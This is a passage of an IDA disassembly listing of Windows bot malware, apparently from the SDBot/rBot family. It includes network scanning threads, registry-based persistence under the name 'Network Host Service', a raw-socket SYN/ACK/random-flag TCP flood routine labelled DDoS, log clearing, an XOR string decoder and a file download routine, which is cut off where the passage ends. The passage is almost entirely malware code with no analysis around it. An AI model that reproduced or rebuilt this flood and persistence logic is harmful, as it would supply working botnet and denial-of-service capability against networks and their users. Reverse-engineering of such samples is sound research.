sub_401967 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_401B9D proc near ; DATA XREF: sub_4089DC+3FF9�o
; sub_4089DC+5A2D�o
var_304 = dword ptr -304h
var_250 = byte ptr -250h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 250h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 74h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_250]
rep movsd
mov dword ptr [eax+1C8h], 1
lea eax, [ebp+74h+var_250]
push eax
call dword_43587C ; inet_addr
mov ecx, [ebp+74h+var_AC]
sub esp, 1D0h
mov dword_42E640[ecx*8], eax
push 74h
pop ecx
lea esi, [ebp+74h+var_250]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 1D0h
cmp [ebp+74h+var_1C0], ebx
jnz short loc_401C0F
mov eax, dword_43535C
mov [ebp+74h+var_1C0], eax
loc_401C0F: ; CODE XREF: sub_401B9D+65�j
push 9
call sub_41248A
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_401C7F
mov esi, offset dword_42F5E0
push esi
call ds:dword_420024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_420020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_401C7F
lea eax, [ebp+74h+var_80]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_414415
cmp [ebp+74h+var_90], ebx
pop ecx
pop ecx
jnz short loc_401C69
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4056BF
add esp, 14h
loc_401C69: ; CODE XREF: sub_401B9D+B0�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_401C7F: ; CODE XREF: sub_401B9D+7F�j
; sub_401B9D+9B�j
cmp [ebp+74h+var_A0], edi
mov eax, [ebp+74h+var_AC]
mov esi, ds:dword_420000
mov dword_42E644[eax*8], edi
jb loc_401D30
loc_401C98: ; CODE XREF: sub_401B9D+18D�j
push edi
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_250]
push [ebp+74h+var_B8]
mov [ebp+74h+var_A4], edi
push eax
lea eax, [ebp+74h+var_80]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_414415
push ebx
lea eax, [ebp+74h+var_80]
push 9
push eax
call sub_41229A
mov ecx, [ebp+74h+var_AC]
mov [ebp+74h+var_A8], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_4366A4[eax], ecx
lea eax, [ebp+74h+var_250]
push eax
push offset sub_401967
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+74h+var_A8]
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz short loc_401D47
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_414415
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
add esp, 10h
loc_401D22: ; CODE XREF: sub_401B9D+1AF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+74h+var_A0]
jbe loc_401C98
loc_401D30: ; CODE XREF: sub_401B9D+F5�j
cmp [ebp+74h+var_B0], ebx
jz short loc_401D55
mov eax, [ebp+74h+var_B0]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401D62
; ---------------------------------------------------------------------------
loc_401D43: ; CODE XREF: sub_401B9D+1AD�j
push 1Eh
call esi ; Sleep
loc_401D47: ; CODE XREF: sub_401B9D+162�j
cmp [ebp+74h+var_84], ebx
jz short loc_401D43
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D4E: ; CODE XREF: sub_401B9D+1C3�j
push 7D0h
call esi ; Sleep
loc_401D55: ; CODE XREF: sub_401B9D+196�j
mov eax, [ebp+74h+var_AC]
cmp dword_42E644[eax*8], 1
jz short loc_401D4E
loc_401D62: ; CODE XREF: sub_401B9D+1A4�j
push [ebp+74h+var_B0]
mov eax, [ebp+74h+var_AC]
push [ebp+74h+var_B8]
mov eax, dword_42E640[eax*8]
push eax
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_80]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_414415
add esp, 14h
cmp [ebp+74h+var_90], ebx
jnz short loc_401DAA
push ebx
push [ebp+74h+var_94]
lea eax, [ebp+74h+var_80]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
push [ebp+74h+var_BC]
call sub_4056BF
add esp, 14h
loc_401DAA: ; CODE XREF: sub_401B9D+1F1�j
lea eax, [ebp+74h+var_80]
push eax
call sub_401EFF
mov eax, [ebp+74h+var_AC]
mov dword_42E644[eax*8], ebx
mov [esp+290h+var_304], 0BB8h
call esi ; Sleep
push 9
call sub_41248A
cmp eax, 1
pop ecx
jnz short loc_401DDE
push offset dword_42F5E0
call ds:dword_420024 ; RtlDeleteCriticalSection
loc_401DDE: ; CODE XREF: sub_401B9D+234�j
push [ebp+74h+var_AC]
call sub_41255E
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_401B9D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401DEF proc near ; CODE XREF: sub_4089DC+3648�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_47B398
loc_401DF9: ; CODE XREF: sub_401DEF+4D�j
cmp byte ptr [edi], 0
jz short loc_401E40
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401E04: ; CODE XREF: sub_401DEF+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401E26
test cl, cl
jz short loc_401E22
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401E26
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401E04
loc_401E22: ; CODE XREF: sub_401DEF+1F�j
xor eax, eax
jmp short loc_401E2B
; ---------------------------------------------------------------------------
loc_401E26: ; CODE XREF: sub_401DEF+1B�j
; sub_401DEF+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401E2B: ; CODE XREF: sub_401DEF+35�j
test eax, eax
jz short loc_401E40
add edi, 0B8h
inc ebx
cmp edi, offset dword_47BF18
jl short loc_401DF9
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401E40: ; CODE XREF: sub_401DEF+D�j
; sub_401DEF+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_47B398[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_4144A0
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_47B3B0[esi]
push eax
call sub_4144A0
add esp, 18h
inc dword_42C308
loc_401E81: ; CODE XREF: sub_401DEF+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401DEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E87 proc near ; CODE XREF: sub_4089DC+4A57�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
xor edi, edi
mov esi, offset dword_47B398
loc_401EB1: ; CODE XREF: sub_401E87+72�j
cmp byte ptr [esi], 0
jz short loc_401EEC
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41466D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 2Ch
loc_401EEC: ; CODE XREF: sub_401E87+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_47BF18
jl short loc_401EB1
pop edi
pop esi
leave
retn
sub_401E87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EFF proc near ; CODE XREF: sub_401000+BE�p
; sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_420028 ; GetLocalTime
mov ebx, offset dword_433EF8
mov edi, 80h
mov esi, offset dword_42FEF8
loc_401F21: ; CODE XREF: sub_401EFF+3D�j
cmp byte ptr [ebx], 0
jz short loc_401F38
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_4144A0
add esp, 0Ch
loc_401F38: ; CODE XREF: sub_401EFF+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401F21
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41466D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F73 proc near ; CODE XREF: sub_40887D+A4�p
; sub_4089DC:loc_40BD74�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_4146C4
lea eax, [ebp+var_80]
push eax
call sub_401EFF
add esp, 14h
leave
retn
sub_401F73 endp
; =============== S U B R O U T I N E =======================================
sub_401F9F proc near ; CODE XREF: sub_4089DC+494B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42FEF8
xor ecx, ecx
loc_401FA6: ; CODE XREF: sub_401F9F+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_433EF8
jl short loc_401FA6
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401FD6
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4056BF
add esp, 14h
loc_401FD6: ; CODE XREF: sub_401F9F+1F�j
push esi
call sub_401EFF
pop ecx
pop esi
retn
sub_401F9F endp
; =============== S U B R O U T I N E =======================================
sub_401FDF proc near ; CODE XREF: .text:00413D1D�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42FEF8
loc_401FE5: ; CODE XREF: sub_401FDF+27�j
cmp byte ptr [esi], 0
jz short loc_401FFA
push [esp+4+arg_0]
push esi
call sub_406BB7
test eax, eax
pop ecx
pop ecx
jnz short loc_40200C
loc_401FFA: ; CODE XREF: sub_401FDF+9�j
add esi, 80h
cmp esi, offset dword_433EF8
jl short loc_401FE5
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401FDF+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401FDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402011 proc near ; DATA XREF: sub_4089DC+4A02�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_402064
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_4056BF
add esp, 14h
loc_402064: ; CODE XREF: sub_402011+33�j
cmp [ebp+var_98], 0
jz short loc_402084
lea eax, [ebp+var_98]
push eax
call sub_4147A2
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_402084
mov [ebp+var_8], eax
loc_402084: ; CODE XREF: sub_402011+5A�j
; sub_402011+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_42FEF8
loc_40208D: ; CODE XREF: sub_402011+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_4020E7
cmp byte ptr [esi], 0
jz short loc_4020D6
cmp [ebp+var_98], 0
jz short loc_4020BC
cmp [ebp+var_4], 0
jnz short loc_4020BC
lea eax, [ebp+var_98]
push eax
push esi
call sub_406BB7
test eax, eax
pop ecx
pop ecx
jz short loc_4020D6
loc_4020BC: ; CODE XREF: sub_402011+90�j
; sub_402011+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_4056BF
add esp, 14h
loc_4020D6: ; CODE XREF: sub_402011+87�j
; sub_402011+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_433EF8
jl short loc_40208D
loc_4020E7: ; CODE XREF: sub_402011+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_414415
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_402121
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_4056BF
add esp, 14h
loc_402121: ; CODE XREF: sub_402011+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401EFF
push [ebp+var_18]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_402011 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40213F proc near ; CODE XREF: sub_4069F7+1E�p
; sub_40E6BB+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_40214F: ; CODE XREF: sub_40213F+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42B3CC[edi]
push dword_42B3C8[edi]
call dword_435850 ; RegCreateKeyExA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_402195
lea edx, [eax+1]
loc_402179: ; CODE XREF: sub_40213F+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402179
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_4357EC ; RegSetValueExA
jmp short loc_40219F
; ---------------------------------------------------------------------------
loc_402195: ; CODE XREF: sub_40213F+35�j
push esi
push [ebp+var_4]
call dword_435844 ; RegDeleteValueA
loc_40219F: ; CODE XREF: sub_40213F+54�j
push [ebp+var_4]
call dword_4358E4 ; RegCloseKey
add edi, 8
cmp edi, 18h
jb short loc_40214F
pop edi
pop esi
pop ebx
leave
retn
sub_40213F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_4021B5 proc near ; CODE XREF: sub_4024A4+40�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = dword ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_A8], bl
lea edi, [ebp+64h+var_A7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call dword_435818 ; WSAStartup
test eax, eax
jz short loc_4021F1
xor eax, eax
jmp loc_40249D
; ---------------------------------------------------------------------------
loc_4021F1: ; CODE XREF: sub_4021B5+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_43578C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_18], eax
jz loc_402495
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push ebx
push eax
mov [ebp+64h+var_44], edi
call dword_435824 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_40248C
push esi
push [ebp+64h+arg_C]
mov [ebp+64h+var_B8], 2
call dword_435954 ; htons
mov esi, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_B6], ax
mov [ebp+64h+var_B4], esi
mov [ebp+64h+var_30], 45h
call dword_435954 ; htons
push [ebp+64h+arg_C]
mov [ebp+64h+var_2E], ax
mov [ebp+64h+var_2C], di
mov [ebp+64h+var_2A], bx
mov [ebp+64h+var_28], 80h
mov [ebp+64h+var_27], 6
mov [ebp+64h+var_26], bx
mov [ebp+64h+var_20], esi
call dword_435954 ; htons
mov [ebp+64h+var_12], ax
call sub_4145D1
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_435954 ; htons
push 12345678h
call dword_43592C ; htonl
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4022B8
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 2
jmp short loc_402308
; ---------------------------------------------------------------------------
loc_4022B8: ; CODE XREF: sub_4021B5+F8�j
mov esi, [ebp+64h+arg_8]
push 9
mov edi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4022D2
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 10h
jmp short loc_402308
; ---------------------------------------------------------------------------
loc_4022D2: ; CODE XREF: sub_4021B5+112�j
mov esi, [ebp+64h+arg_8]
push 0Ch
mov edi, offset aDdos_random ; "ddos.random"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402308
call sub_4145D1
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_C], edx
call sub_4145D1
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_7], dl
loc_402308: ; CODE XREF: sub_4021B5+101�j
; sub_4021B5+11B�j ...
push 4000h
mov [ebp+64h+var_8], 50h
call dword_435954 ; htons
mov [ebp+64h+var_6], ax
lea eax, [ebp+64h+var_6C]
push eax
mov [ebp+64h+var_2], bx
mov [ebp+64h+var_1C], ebx
call ds:dword_420030 ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
push [ebp+64h+var_68]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_6C]
cdq
push edx
push eax
call sub_414CC0
add eax, [ebp+64h+var_38]
adc edx, [ebp+64h+var_34]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
jmp short loc_40237C
; ---------------------------------------------------------------------------
loc_402355: ; CODE XREF: sub_4021B5+2A4�j
add [ebp+64h+var_1C], eax
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+64h+var_34]
cmp eax, [ebp+64h+var_3C]
jg loc_402488
jl short loc_40237C
mov eax, [ebp+64h+var_38]
cmp eax, [ebp+64h+var_40]
jnb loc_402488
loc_40237C: ; CODE XREF: sub_4021B5+19E�j
; sub_4021B5+1B9�j
mov [ebp+64h+var_4], bx
call sub_4145D1
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_435954 ; htons
mov [ebp+64h+var_14], ax
call sub_4145D1
call sub_4145D1
push eax
call dword_435954 ; htons
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call dword_43592C ; htonl
inc [ebp+64h+arg_4]
mov esi, eax
mov eax, [ebp+64h+arg_0]
push 14h
mov [ebp+64h+var_60], eax
mov [ebp+64h+var_24], esi
mov [ebp+64h+var_5C], bl
mov [ebp+64h+var_5B], 6
call dword_435954 ; htons
push 8
pop ecx
mov [ebp+64h+var_64], esi
mov [ebp+64h+var_5A], ax
push 5
lea esi, [ebp+64h+var_64]
lea edi, [ebp+64h+var_A8]
rep movsd
pop ecx
lea eax, [ebp+64h+var_A8]
push 34h
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_88]
push eax
rep movsd
call sub_407D6B
push 5
pop ecx
push 5
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
mov [ebp+64h+var_4], ax
pop ecx
lea esi, [ebp+64h+var_14]
lea edi, [ebp+64h+var_94]
rep movsd
xor eax, eax
lea edi, [ebp+64h+var_80]
stosd
lea eax, [ebp+64h+var_A8]
push 28h
push eax
call sub_407D6B
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+64h+var_26], ax
lea eax, [ebp+64h+var_B8]
push eax
push ebx
push 28h
lea eax, [ebp+64h+var_A8]
push eax
push [ebp+64h+var_18]
lea esi, [ebp+64h+var_30]
lea edi, [ebp+64h+var_A8]
rep movsd
call dword_4357D8 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_402355
call dword_4358C0 ; WSAGetLastError
push eax
lea eax, [ebp+64h+var_F8]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax
call sub_414415
lea eax, [ebp+64h+var_F8]
push eax
call sub_401EFF
add esp, 10h
jmp short loc_40248B
; ---------------------------------------------------------------------------
loc_402488: ; CODE XREF: sub_4021B5+1B3�j
; sub_4021B5+1C1�j
mov ebx, [ebp+64h+var_1C]
loc_40248B: ; CODE XREF: sub_4021B5+2D1�j
pop esi
loc_40248C: ; CODE XREF: sub_4021B5+73�j
push [ebp+64h+var_18]
call dword_435914 ; closesocket
loc_402495: ; CODE XREF: sub_4021B5+57�j
call dword_435920 ; WSACleanup
mov eax, ebx
loc_40249D: ; CODE XREF: sub_4021B5+37�j
pop edi
pop ebx
add ebp, 64h
leave
retn
sub_4021B5 endp
; =============== S U B R O U T I N E =======================================
sub_4024A4 proc near ; CODE XREF: sub_402500+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_407BFF
push [esp+10h+arg_4]
mov esi, eax
call sub_4147A2
push [esp+14h+arg_C]
mov ebx, eax
call sub_4147A2
mov edi, eax
call sub_4145D1
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4021B5
add esp, 20h
test eax, eax
jnz short loc_4024F1
inc eax
loc_4024F1: ; CODE XREF: sub_4024A4+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4024A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402500 proc near ; DATA XREF: sub_4089DC+2AE5�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_420004 ; GetTickCount
push eax
call sub_4145C4
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4024A4
push eax
lea eax, [ebp+var_494]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax
call sub_414415
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_402590
push esi
push [ebp+var_C]
lea eax, [ebp+var_494]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_4056BF
add esp, 14h
loc_402590: ; CODE XREF: sub_402500+6E�j
lea eax, [ebp+var_494]
push eax
call sub_401EFF
push [ebp+var_290]
call sub_41255E
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_402500 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4025B1 proc near ; CODE XREF: sub_4025CE+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_4025CD
loc_4025BD: ; CODE XREF: sub_4025B1+1A�j
mov dl, byte_42BED0
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_4025BD
locret_4025CD: ; CODE XREF: sub_4025B1+A�j
retn
sub_4025B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025CE proc near ; DATA XREF: sub_4089DC+28D5�o
; sub_4089DC+30CE�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_435948
call dword_435810 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_402A7D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call ds:dword_420044 ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_402695
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_402678
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056BF
add esp, 14h
loc_402678: ; CODE XREF: sub_4025CE+88�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
push [ebp+var_8C]
call sub_41255E
pop ecx
jmp loc_402ADE
; ---------------------------------------------------------------------------
loc_402695: ; CODE XREF: sub_4025CE+68�j
xor esi, esi
call ds:dword_420004 ; GetTickCount
